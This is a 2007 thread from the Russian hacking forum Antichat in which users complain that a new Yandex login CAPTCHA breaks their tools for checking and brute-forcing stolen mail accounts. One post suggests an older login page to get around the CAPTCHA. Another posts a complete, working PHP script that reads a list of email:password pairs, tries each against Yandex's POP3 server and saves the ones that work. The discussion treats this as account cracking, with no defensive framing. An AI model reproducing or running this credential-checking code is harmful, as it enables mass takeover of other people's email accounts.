HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости Mail-сервис
Перезагрузить страницу yandex авторизация
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

yandex авторизация
  #1  
Старый 29.05.2007, 23:06
genom--
Постоянный
Регистрация: 09.07.2006
Сообщений: 937
С нами: 10441826

Репутация: 1686


По умолчанию yandex авторизация
сегодня по делам запустил свой чекер мыл на валид чекал яндекс и смотрю все мыла идут в бэд --- зашел на сайт посмотрел они ввели картинку с вводом цифр при авторизации --- еще толком не разберался в ответах сервера на запросы авторизации может какнибуть можно будет сделать чекер или брутер -- но факт остается фактом вроде поставили новую защиту

ps -- если боян и оно там уже висит давно -- то хз я им часто не пользуюсь
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 29.05.2007, 23:10
freddi
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
С нами: 10447337

Репутация: 807
По умолчанию
давно, месяц гдето. мой папа каждый день когда заходит в почту сильно выругивается)
 
Ответить с цитированием

  #3  
Старый 29.05.2007, 23:53
Digimortal
Banned
Регистрация: 22.08.2006
Сообщений: 608
С нами: 10378404

Репутация: 1095


По умолчанию
там вроде как картинка вылазит тока после нескольких неудачных авторизаций, и уже давно это было сделано..
 
Ответить с цитированием

  #4  
Старый 30.05.2007, 00:17
genom--
Постоянный
Регистрация: 09.07.2006
Сообщений: 937
С нами: 10441826

Репутация: 1686


По умолчанию
хз до последнего времени я чекал по несколько сотен акко и нормально было а в этот раз вот какое дело вышло =(
 
Ответить с цитированием

  #5  
Старый 30.05.2007, 08:50
F!$T
Участник форума
Регистрация: 05.02.2007
Сообщений: 142
С нами: 10137926

Репутация: 995
По умолчанию
freddi - прав. Картинка появляется только после неудачной авторизации. А если ты зайдешь на http://mail.yandex.ru/classic/ - то никакой картинки не будет. ИМХО брутить надо другие ящики =)
 
Ответить с цитированием

  #6  
Старый 30.05.2007, 10:45
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами: 10274726

Репутация: 1917


По умолчанию
Цитата:
Сообщение от Egorka-Fist  
freddi - прав. Картинка появляется только после неудачной авторизации. А если ты зайдешь на http://mail.yandex.ru/classic/ - то никакой картинки не будет. ИМХО брутить надо другие ящики =)
а причем здесь это? чеккер же не на 80 порту работает... кстати а на чем чеккер то написан?

если perl... php.. давай скрипты
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #7  
Старый 30.05.2007, 10:59
freddi
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
С нами: 10447337

Репутация: 807
По умолчанию
"Картинка появляется только после неудачной авторизации"

если пароль правильно ввести он тоже перебросит на авторизацию с картинкой. у них новый метод защиты.
 
Ответить с цитированием

  #8  
Старый 30.05.2007, 11:16
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами: 10274726

Репутация: 1917


По умолчанию
вот скрипт он работает щас накатал

Код:
<?php
error_reporting(E_ALL);
set_time_limit(0);
$fr=fopen("resu","r");
$fw=fopen("resu1","w");
echo "<pre>";
while (!feof ($fr)) {
    $buffer = fgets($fr,255);
    $lp=explode(':',$buffer,2);
    $log=explode('@',$lp[0],2);

  if (($log[1]=='yandex.ru')  and (isset($lp[1]))){

  $ock=fsockopen("pop.yandex.ru",110);
  $html=fgets($ock);
  $usr="user ".$log[0]."\r\n";
  fputs($ock,$usr);
  $html=fgets($ock);
   $pwr="pass ".$lp[1]."\r\n";
   fputs($ock,$pwr);
    echo $buffer;
$html=fgets($ock);
    echo $html."\r\n";
  if (preg_match("/OK/",$html)) {
     fputs($fw,$buffer);
      fclose($ock);}
   else {fclose($ock);}
}
}
echo "OK!";
echo "</pre>";
fclose($fr);
fclose($fw);
?>
в resu - мыльники и пароли формата: dfdff@yandex.ru:eerdf

в resu1 будут валиды


Ну че ктонить попробовал? самому интересно, а то лист мыльников небольшой у меня был...
__________________
Карфаген должен быть разрушен...
Последний раз редактировалось Scipio; 30.05.2007 в 12:12..
 
Ответить с цитированием

  #9  
Старый 03.06.2007, 20:57
genom--
Постоянный
Регистрация: 09.07.2006
Сообщений: 937
С нами: 10441826

Репутация: 1686


По умолчанию
Scipio если ты не заметил то речь идет о веб авторизации а не о pop сервере =) -- так можно и через брутус проверить
 
Ответить с цитированием

  #10  
Старый 03.06.2007, 22:01
BlackCats
Постоянный
Регистрация: 01.02.2006
Сообщений: 970
С нами: 10669286

Репутация: 1942


По умолчанию
хз, у меня нету картинкиЮ даже когда ошибся - она не появилась...
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Yandex Client! Форм грабер + icq VaV Разное - Покупка, продажа, обмен 16 01.01.2007 05:04
Хитрый Yandex, ЭВРИКА ! Simple Man Уязвимости Mail-сервис 7 27.08.2005 14:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.